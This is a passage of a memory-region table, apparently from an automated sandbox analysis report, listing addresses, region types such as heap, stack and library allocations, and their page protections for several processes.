page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
24E81BA2000
|
trusted library allocation
|
page read and write
|
||
595187E000
|
stack
|
page read and write
|
||
53E17FF000
|
stack
|
page read and write
|
||
53E0FFF000
|
stack
|
page read and write
|
||
1B991CCD000
|
heap
|
page read and write
|
||
2905D600000
|
heap
|
page readonly
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
24E8200D000
|
trusted library allocation
|
page read and write
|
||
3CAF000
|
stack
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1EA3D19E000
|
heap
|
page read and write
|
||
1208E7B0000
|
trusted library allocation
|
page read and write
|
||
29B32973000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
29B1A850000
|
trusted library allocation
|
page read and write
|
||
23A3AD38000
|
trusted library allocation
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
29B1A420000
|
heap
|
page execute and read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
29B1BD50000
|
trusted library allocation
|
page read and write
|
||
2CEE000
|
stack
|
page read and write
|
||
2102F2ED000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
10C5000
|
heap
|
page read and write
|
||
24E99D60000
|
heap
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
E093878000
|
stack
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1208E88F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
5B0F7FE000
|
stack
|
page read and write
|
||
16891E50000
|
heap
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
5B0000
|
heap
|
page read and write
|
||
D22B5F8000
|
stack
|
page read and write
|
||
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
24EFFB10000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
24099901000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
7DF4483D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
23A3ACDF000
|
trusted library allocation
|
page read and write
|
||
1EA3D1C0000
|
heap
|
page read and write
|
||
1EA3D208000
|
heap
|
page read and write
|
||
1EA3D1C4000
|
heap
|
page read and write
|
||
2905D550000
|
heap
|
page read and write
|
||
C7B5B9000
|
stack
|
page read and write
|
||
1C2808D9000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
24E82016000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
16E6D998000
|
heap
|
page read and write
|
||
1EA4EFA1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
165BC7D000
|
stack
|
page read and write
|
||
84FB4FD000
|
stack
|
page read and write
|
||
13135926000
|
heap
|
page execute and read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
21CEFAC3000
|
heap
|
page read and write
|
||
1DBF80B6000
|
heap
|
page read and write
|
||
2905D657000
|
heap
|
page read and write
|
||
1E09E7E000
|
stack
|
page read and write
|
||
155AB0CC000
|
heap
|
page read and write
|
||
A051FE000
|
stack
|
page read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
F5D7CE000
|
stack
|
page read and write
|
||
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
16891BE8000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
C7B37F000
|
stack
|
page read and write
|
||
20FEA050000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
24E81B00000
|
heap
|
page execute and read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
CBC000
|
stack
|
page read and write
|
||
1B993E0D000
|
trusted library allocation
|
page read and write
|
||
20FEC170000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
10C0000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
16893690000
|
heap
|
page execute and read and write
|
||
23A52E93000
|
heap
|
page read and write
|
||
290774C4000
|
heap
|
page read and write
|
||
5951AFE000
|
stack
|
page read and write
|
||
29B1A480000
|
heap
|
page read and write
|
||
2905EF4F000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
A04AFF000
|
stack
|
page read and write
|
||
1E0AD4E000
|
stack
|
page read and write
|
||
D22B77E000
|
stack
|
page read and write
|
||
23A3A8E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
20FEA0D8000
|
heap
|
page read and write
|
||
20FEC470000
|
heap
|
page read and write
|
||
155C529B000
|
heap
|
page read and write
|
||
20FEC253000
|
heap
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
D32E4FF000
|
stack
|
page read and write
|
||
1EA3D130000
|
heap
|
page read and write
|
||
120A6B92000
|
heap
|
page read and write
|
||
16E6D918000
|
heap
|
page read and write
|
||
1C2808D5000
|
heap
|
page read and write
|
||
1CC000
|
stack
|
page read and write
|
||
155AD310000
|
trusted library allocation
|
page read and write
|
||
1C292830000
|
trusted library allocation
|
page read and write
|
||
BB4593B000
|
stack
|
page read and write
|
||
4459883000
|
stack
|
page read and write
|
||
59516FD000
|
stack
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
20FEA158000
|
heap
|
page read and write
|
||
F5DD7E000
|
stack
|
page read and write
|
||
2409995F000
|
heap
|
page read and write
|
||
155AB34B000
|
heap
|
page read and write
|
||
23A38E60000
|
heap
|
page read and write
|
||
1AFAF6A1000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
29B32921000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
1EA3EFE6000
|
trusted library allocation
|
page read and write
|
||
290774C6000
|
heap
|
page read and write
|
||
1AFAD6F6000
|
heap
|
page read and write
|
||
2102EA15000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
23A38D67000
|
heap
|
page read and write
|
||
13CE87F000
|
stack
|
page read and write
|
||
13CE97D000
|
stack
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
1C2828A8000
|
trusted library allocation
|
page read and write
|
||
21CEFA9D000
|
heap
|
page read and write
|
||
16E6FA74000
|
heap
|
page read and write
|
||
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
1E0A17E000
|
stack
|
page read and write
|
||
595177E000
|
stack
|
page read and write
|
||
1208EBF2000
|
trusted library allocation
|
page read and write
|
||
23A3B325000
|
trusted library allocation
|
page read and write
|
||
2102CFB0000
|
heap
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
1AFAF917000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
1C29A968000
|
heap
|
page read and write
|
||
1EA3EE71000
|
heap
|
page read and write
|
||
21CED870000
|
heap
|
page read and write
|
||
2216E9C3000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAAC000
|
trusted library allocation
|
page read and write
|
||
155AB0AC000
|
heap
|
page read and write
|
||
595131F000
|
stack
|
page read and write
|
||
29B32A40000
|
heap
|
page execute and read and write
|
||
23A3AD32000
|
trusted library allocation
|
page read and write
|
||
21CED9BD000
|
heap
|
page read and write
|
||
1208CABE000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
1C2807E0000
|
heap
|
page read and write
|
||
20FEC225000
|
heap
|
page read and write
|
||
1208CB23000
|
heap
|
page read and write
|
||
1311D270000
|
heap
|
page execute and read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
16E10072000
|
trusted library allocation
|
page read and write
|
||
1EA3EFEA000
|
trusted library allocation
|
page read and write
|
||
20FEC1BF000
|
heap
|
page read and write
|
||
120A6B50000
|
heap
|
page read and write
|
||
23A38D7B000
|
heap
|
page read and write
|
||
13135891000
|
heap
|
page read and write
|
||
13CEA7E000
|
stack
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
8FC000
|
stack
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
24E9A00A000
|
heap
|
page read and write
|
||
155C5046000
|
heap
|
page execute and read and write
|
||
13CEB79000
|
stack
|
page read and write
|
||
E5F82FF000
|
stack
|
page read and write
|
||
7FFD9B999000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
29B1BCF1000
|
trusted library allocation
|
page read and write
|
||
155C5190000
|
heap
|
page read and write
|
||
13CE58F000
|
stack
|
page read and write
|
||
23A3B32E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
24099A8A000
|
heap
|
page read and write
|
||
2102E931000
|
trusted library allocation
|
page read and write
|
||
2216C8BB000
|
heap
|
page read and write
|
||
5951B7E000
|
stack
|
page read and write
|
||
1208E773000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
16E0047C000
|
trusted library allocation
|
page read and write
|
||
BB4537D000
|
stack
|
page read and write
|
||
23A3B557000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
21CED840000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
1C29AA1B000
|
heap
|
page read and write
|
||
21CEFAA3000
|
heap
|
page read and write
|
||
29B32A47000
|
heap
|
page execute and read and write
|
||
7FFD9BA31000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
16E6F2B0000
|
heap
|
page read and write
|
||
29B1A858000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
16E6FA42000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
1AFAD6F5000
|
heap
|
page read and write
|
||
2216EA31000
|
heap
|
page read and write
|
||
F5DCFE000
|
stack
|
page read and write
|
||
1311B860000
|
trusted library allocation
|
page read and write
|
||
24E81B41000
|
trusted library allocation
|
page read and write
|
||
BB456BE000
|
stack
|
page read and write
|
||
E5F81FE000
|
stack
|
page read and write
|
||
1257000
|
heap
|
page read and write
|
||
21047100000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
2102E967000
|
trusted library allocation
|
page read and write
|
||
1AFAF711000
|
heap
|
page read and write
|
||
155BCCA2000
|
trusted library allocation
|
page read and write
|
||
2102E9A4000
|
trusted library allocation
|
page read and write
|
||
2102F353000
|
trusted library allocation
|
page read and write
|
||
2216EA30000
|
heap
|
page read and write
|
||
C7C20F000
|
stack
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
5B0F1FF000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
445A1FE000
|
stack
|
page read and write
|
||
7FFD9BA73000
|
trusted library allocation
|
page read and write
|
||
2216E930000
|
heap
|
page read and write
|
||
D32EBFC000
|
stack
|
page read and write
|
||
23A52E60000
|
heap
|
page execute and read and write
|
||
A04FF7000
|
stack
|
page read and write
|
||
29B32BF1000
|
heap
|
page read and write
|
||
2216E9C3000
|
heap
|
page read and write
|
||
29060F32000
|
trusted library allocation
|
page read and write
|
||
24E9A000000
|
heap
|
page read and write
|
||
29077470000
|
heap
|
page execute and read and write
|
||
13CECF8000
|
stack
|
page read and write
|
||
155BCC31000
|
trusted library allocation
|
page read and write
|
||
168A371C000
|
trusted library allocation
|
page read and write
|
||
29077730000
|
heap
|
page execute and read and write
|
||
1C280AA0000
|
trusted library allocation
|
page read and write
|
||
2103E992000
|
trusted library allocation
|
page read and write
|
||
1B991CD2000
|
heap
|
page read and write
|
||
1EA3F4A1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
2102CC60000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
1208CC90000
|
heap
|
page read and write
|
||
D22B17F000
|
stack
|
page read and write
|
||
23A3A861000
|
trusted library allocation
|
page read and write
|
||
445A27B000
|
stack
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
1C280982000
|
heap
|
page read and write
|
||
1DBF8065000
|
heap
|
page read and write
|
||
2216C838000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
23A4A870000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1C282932000
|
trusted library allocation
|
page read and write
|
||
16893650000
|
heap
|
page execute and read and write
|
||
1B9ABDAC000
|
heap
|
page read and write
|
||
23A3B593000
|
trusted library allocation
|
page read and write
|
||
1B9A3939000
|
trusted library allocation
|
page read and write
|
||
16E10011000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
20FEBB50000
|
trusted library allocation
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
1208CAA8000
|
heap
|
page read and write
|
||
2905FFF1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
20F90070000
|
trusted library allocation
|
page read and write
|
||
1C29A9D1000
|
heap
|
page read and write
|
||
1AFAF91A000
|
heap
|
page read and write
|
||
23A3B304000
|
trusted library allocation
|
page read and write
|
||
D32E57E000
|
stack
|
page read and write
|
||
1EA3F357000
|
trusted library allocation
|
page read and write
|
||
1EA57370000
|
heap
|
page read and write
|
||
1AFAD6E8000
|
heap
|
page read and write
|
||
1AFAF919000
|
heap
|
page read and write
|
||
1B9943C7000
|
trusted library allocation
|
page read and write
|
||
20F81C03000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9B995000
|
trusted library allocation
|
page read and write
|
||
1B991ED5000
|
heap
|
page read and write
|
||
2103E933000
|
trusted library allocation
|
page read and write
|
||
16E6F300000
|
trusted library allocation
|
page read and write
|
||
29B1A6B1000
|
trusted library allocation
|
page read and write
|
||
20FEC1C5000
|
heap
|
page read and write
|
||
D32EB7E000
|
stack
|
page read and write
|
||
BB4527F000
|
stack
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
155C5290000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
4459DFF000
|
stack
|
page read and write
|
||
24EFFEB4000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
1EA3EFA1000
|
trusted library allocation
|
page read and write
|
||
24EFFEC0000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
23A3B53D000
|
trusted library allocation
|
page read and write
|
||
16E6FA79000
|
heap
|
page read and write
|
||
23A52FB2000
|
heap
|
page read and write
|
||
120A6B79000
|
heap
|
page read and write
|
||
53E15FE000
|
stack
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
16E6FAC0000
|
heap
|
page read and write
|
||
1B991EF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
1C28291A000
|
trusted library allocation
|
page read and write
|
||
20F81B3A000
|
trusted library allocation
|
page read and write
|
||
F5DFFE000
|
stack
|
page read and write
|
||
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
29B1BABA000
|
trusted library allocation
|
page read and write
|
||
C7B6BF000
|
stack
|
page read and write
|
||
29B189FA000
|
heap
|
page read and write
|
||
13135808000
|
heap
|
page read and write
|
||
16891D90000
|
heap
|
page readonly
|
||
E0938F7000
|
stack
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
23A3A850000
|
heap
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
1AFAD600000
|
heap
|
page read and write
|
||
2216E632000
|
heap
|
page read and write
|
||
23A38D5D000
|
heap
|
page read and write
|
||
16891DB0000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
1311D200000
|
heap
|
page execute and read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
595167E000
|
stack
|
page read and write
|
||
1C282821000
|
trusted library allocation
|
page read and write
|
||
B51D87D000
|
stack
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
1DBF8000000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
29B18A35000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
E093AFD000
|
stack
|
page read and write
|
||
1AFAD76B000
|
heap
|
page read and write
|
||
23A3ABF1000
|
trusted library allocation
|
page read and write
|
||
1B9ABCD0000
|
heap
|
page execute and read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
290774B0000
|
heap
|
page read and write
|
||
16891E55000
|
heap
|
page read and write
|
||
29B189B0000
|
heap
|
page read and write
|
||
2216E9B3000
|
heap
|
page read and write
|
||
3BAE000
|
stack
|
page read and write
|
||
155AB260000
|
trusted library allocation
|
page read and write
|
||
20FEC24A000
|
heap
|
page read and write
|
||
5951977000
|
stack
|
page read and write
|
||
2102CD9E000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
2905D610000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
24E99F06000
|
heap
|
page read and write
|
||
C7B073000
|
stack
|
page read and write
|
||
1208E6F0000
|
heap
|
page execute and read and write
|
||
168ABEEF000
|
heap
|
page read and write
|
||
155BCC40000
|
trusted library allocation
|
page read and write
|
||
2102CF20000
|
heap
|
page readonly
|
||
293CCC3000
|
stack
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
155ACC7E000
|
trusted library allocation
|
page read and write
|
||
16E6D995000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1B993E47000
|
trusted library allocation
|
page read and write
|
||
21CEF8A1000
|
heap
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
9ED70FE000
|
stack
|
page read and write
|
||
1311D4B1000
|
trusted library allocation
|
page read and write
|
||
1EA3EE30000
|
heap
|
page read and write
|
||
165BCFE000
|
stack
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
16894ED3000
|
trusted library allocation
|
page read and write
|
||
1EA3D1A5000
|
heap
|
page read and write
|
||
1208CCB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
24E81990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2102E97D000
|
trusted library allocation
|
page read and write
|
||
5951BFF000
|
stack
|
page read and write
|
||
1B993C8E000
|
trusted library allocation
|
page read and write
|
||
59518F8000
|
stack
|
page read and write
|
||
293D33E000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
23A3ABED000
|
trusted library allocation
|
page read and write
|
||
1B9ABE00000
|
heap
|
page read and write
|
||
23A3B597000
|
trusted library allocation
|
page read and write
|
||
2906F430000
|
trusted library allocation
|
page read and write
|
||
2905EF03000
|
trusted library allocation
|
page read and write
|
||
23A52CB0000
|
heap
|
page read and write
|
||
165BBFE000
|
stack
|
page read and write
|
||
24E824A8000
|
trusted library allocation
|
page read and write
|
||
155AB340000
|
heap
|
page read and write
|
||
2216E69D000
|
heap
|
page read and write
|
||
1EA3EF30000
|
heap
|
page execute and read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
20F80075000
|
trusted library allocation
|
page read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1C29AA50000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
F5DBFD000
|
stack
|
page read and write
|
||
2102EA1B000
|
trusted library allocation
|
page read and write
|
||
1B991CD8000
|
heap
|
page read and write
|
||
2216E9F3000
|
heap
|
page read and write
|
||
1EA3D540000
|
heap
|
page read and write
|
||
B51E80F000
|
stack
|
page read and write
|
||
B51DABE000
|
stack
|
page read and write
|
||
20F90001000
|
trusted library allocation
|
page read and write
|
||
2216C821000
|
heap
|
page read and write
|
||
24E81C27000
|
trusted library allocation
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
23A38F40000
|
heap
|
page read and write
|
||
23A52DC0000
|
heap
|
page execute and read and write
|
||
1274000
|
heap
|
page read and write
|
||
2102CEF0000
|
trusted library allocation
|
page read and write
|
||
20FEC4BD000
|
heap
|
page read and write
|
||
2216E9A4000
|
heap
|
page read and write
|
||
7FFD9B9FA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
29077940000
|
heap
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
2102CF10000
|
trusted library allocation
|
page read and write
|
||
F5DE77000
|
stack
|
page read and write
|
||
24E99F31000
|
heap
|
page read and write
|
||
29B1A95B000
|
trusted library allocation
|
page read and write
|
||
E0934FE000
|
stack
|
page read and write
|
||
128A000
|
heap
|
page read and write
|
||
23A38DA2000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2102CD40000
|
heap
|
page read and write
|
||
155ACD22000
|
trusted library allocation
|
page read and write
|
||
1EA3EFC3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
1C29A930000
|
heap
|
page read and write
|
||
29B18890000
|
heap
|
page read and write
|
||
20FEA12D000
|
heap
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
1B9ABCD7000
|
heap
|
page execute and read and write
|
||
21CEF79E000
|
heap
|
page read and write
|
||
1209E7C2000
|
trusted library allocation
|
page read and write
|
||
5951A7B000
|
stack
|
page read and write
|
||
13CEDFE000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1208CB80000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1C2808AE000
|
heap
|
page read and write
|
||
29077976000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
29B1A330000
|
trusted library allocation
|
page read and write
|
||
23A52D09000
|
heap
|
page read and write
|
||
29B32AE0000
|
heap
|
page read and write
|
||
1AFAF711000
|
heap
|
page read and write
|
||
1B9AC002000
|
heap
|
page read and write
|
||
155AB070000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
1C280890000
|
heap
|
page read and write
|
||
7FFD9BA4E000
|
trusted library allocation
|
page read and write
|
||
1B9ABD96000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
1208E841000
|
trusted library allocation
|
page read and write
|
||
2216E632000
|
heap
|
page read and write
|
||
21CEDC00000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
7FFD9B949000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
165C1BE000
|
stack
|
page read and write
|
||
155AD0D2000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
1EA3D1BC000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
24E8201E000
|
trusted library allocation
|
page read and write
|
||
293CDCF000
|
stack
|
page read and write
|
||
1B991ED0000
|
heap
|
page read and write
|
||
23A38EA0000
|
trusted library allocation
|
page read and write
|
||
1B9ABEF0000
|
heap
|
page execute and read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
131358B7000
|
heap
|
page read and write
|
||
23A38E20000
|
heap
|
page read and write
|
||
E5F7BFE000
|
stack
|
page read and write
|
||
1C280A80000
|
trusted library allocation
|
page read and write
|
||
20F80001000
|
trusted library allocation
|
page read and write
|
||
1EA3F0F3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
21CEFAC3000
|
heap
|
page read and write
|
||
20F81BFF000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
240998A0000
|
heap
|
page read and write
|
||
16E6D9E8000
|
heap
|
page read and write
|
||
155AB0F4000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
240998F8000
|
heap
|
page read and write
|
||
16E6D958000
|
heap
|
page read and write
|
||
2905F070000
|
heap
|
page read and write
|
||
13CEEFB000
|
stack
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
13135885000
|
heap
|
page read and write
|
||
D22ADDE000
|
stack
|
page read and write
|
||
16894AF5000
|
trusted library allocation
|
page read and write
|
||
16E00001000
|
trusted library allocation
|
page read and write
|
||
23A38F80000
|
trusted library allocation
|
page read and write
|
||
1208E854000
|
trusted library allocation
|
page read and write
|
||
293D3B6000
|
stack
|
page read and write
|
||
16E004FE000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1312D371000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
1AFAF5A2000
|
heap
|
page read and write
|
||
3A6E000
|
stack
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
24EFFAE0000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
2905EEB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
168938CB000
|
trusted library allocation
|
page read and write
|
||
1208CAA0000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
20FEBD2E000
|
heap
|
page read and write
|
||
1C280810000
|
heap
|
page read and write
|
||
1C282968000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1AFAD6FE000
|
heap
|
page read and write
|
||
1311DA2B000
|
trusted library allocation
|
page read and write
|
||
20FEBD15000
|
heap
|
page read and write
|
||
1311D360000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
13CE503000
|
stack
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
16E00A31000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1C280B54000
|
heap
|
page read and write
|
||
1EA3EC00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
2216C9B5000
|
heap
|
page read and write
|
||
1EA3D203000
|
heap
|
page read and write
|
||
1B9AC013000
|
heap
|
page read and write
|
||
7FFD9BA1F000
|
trusted library allocation
|
page read and write
|
||
2216E1F0000
|
heap
|
page read and write
|
||
1B993900000
|
heap
|
page execute and read and write
|
||
29B1A332000
|
trusted library allocation
